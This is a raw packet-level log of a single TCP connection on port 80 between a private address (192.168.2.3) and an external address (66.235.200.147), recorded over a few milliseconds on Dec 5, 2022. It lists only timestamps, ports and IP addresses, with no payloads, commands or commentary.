Dec 5, 2022 01:32:31.553165913 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.553848028 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.553854942 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.553880930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.553910017 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.553934097 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.553937912 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.553968906 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.553989887 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.553997040 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554027081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554047108 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.554056883 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554085970 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554105997 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.554116011 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554164886 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.554797888 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554827929 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554856062 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554896116 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554900885 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.554924965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554950953 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.554956913 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.554987907 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555006027 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.555016041 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555044889 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555063009 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.555073023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555128098 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.555782080 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555809975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555840015 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555866957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555890083 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.555898905 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555913925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.555928946 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555957079 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.555980921 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.555985928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556016922 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556034088 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.556046009 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556094885 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.556732893 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.556737900 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556770086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556798935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556818008 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.556827068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556855917 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556885004 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556885004 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.556906939 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.556914091 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556943893 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556943893 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.556972980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.556994915 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.557003975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.557054043 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.557740927 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.557770967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.557800055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.557826042 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.557828903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.557873964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.557892084 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.557904005 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.557934046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.557961941 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.557962894 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.557995081 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.558012009 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.558027983 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.558079004 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.561955929 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.561990023 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562021971 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562043905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.562053919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562118053 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.562167883 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562199116 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562227964 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562247992 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.562295914 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562325001 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562355995 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562356949 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.562416077 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.562421083 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562454939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562484980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562515020 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.562516928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562547922 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562583923 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.562592983 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562648058 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.562650919 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562678099 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562704086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562730074 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.562731981 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.562782049 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.563374043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563404083 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563433886 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563462973 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.563465118 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563497066 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563513994 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.563529968 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563560963 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563577890 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.563590050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563621044 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563649893 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.563651085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.563703060 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.564359903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564399004 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564429045 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564456940 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.564459085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564491034 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564519882 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564532995 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.564553976 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564569950 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.564583063 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564614058 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564631939 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.564644098 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.564699888 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.565382957 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565412998 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565439939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565465927 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.565468073 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565495014 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565521002 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.565525055 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565556049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565578938 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.565583944 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565614939 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565635920 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.565659046 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.565713882 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.566297054 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566325903 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566354990 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566376925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.566381931 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566411018 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566431046 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.566438913 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566469908 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566488981 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.566498041 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566528082 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566546917 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.566556931 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.566612959 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.567249060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567276001 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567301035 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567328930 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567332983 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.567356110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567379951 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.567384958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567414999 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567433119 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.567441940 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567470074 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567495108 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.567498922 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.567548990 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.568217039 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568243980 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568295002 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.568305969 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568334103 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568362951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568387985 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.568392038 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568419933 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568440914 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.568447113 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568479061 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568505049 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.568505049 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.568562031 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.569221973 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569250107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569277048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569305897 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.569314003 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569341898 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569365978 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.569366932 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569395065 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569416046 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.569421053 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569451094 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569469929 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.569478035 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.569528103 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.574851990 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.574912071 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.574943066 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.574969053 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.574995995 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575022936 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575047016 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575073004 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575084925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.575084925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.575084925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.575095892 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575156927 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.575177908 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575207949 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575234890 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575237036 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.575263977 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575284958 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.575292110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575323105 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575340986 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.575349092 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575376987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575401068 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.575402975 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575432062 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.575450897 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.576178074 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576209068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576236010 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576247931 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.576266050 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576284885 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.576292992 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576320887 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576343060 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.576348066 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576378107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576401949 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.576406956 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576433897 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.576456070 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.577071905 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577106953 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577135086 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577147007 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.577162981 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577184916 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.577192068 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577219009 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577239990 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.577244043 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577272892 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577292919 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.577299118 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577327967 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.577348948 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.577989101 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578023911 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578053951 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578069925 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.578080893 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578108072 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578111887 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.578134060 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578160048 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578161001 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.578187943 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578214884 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578233004 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.578241110 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578265905 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.578941107 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.578974962 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579000950 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579025030 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579050064 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579061985 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.579062939 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.579080105 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579108000 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579116106 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.579134941 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579163074 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579161882 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.579193115 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579212904 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.579854965 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579885960 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579912901 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579930067 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.579941988 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579968929 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.579968929 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.579997063 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580022097 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.580024958 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580051899 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580080032 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580082893 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.580106974 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580132008 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.580761909 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580794096 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580825090 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580833912 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.580856085 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580879927 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.580888987 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580920935 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580940008 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.580951929 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.580981970 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581007004 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.581011057 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581042051 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581078053 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.581723928 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581757069 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581787109 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581814051 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.581816912 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581836939 CET	49704	80	192.168.2.3	66.235.200.147
Dec 5, 2022 01:32:31.581851959 CET	80	49704	66.235.200.147	192.168.2.3
Dec 5, 2022 01:32:31.581882000 CET	80	49704	66.235.200.147	192.168.2.3
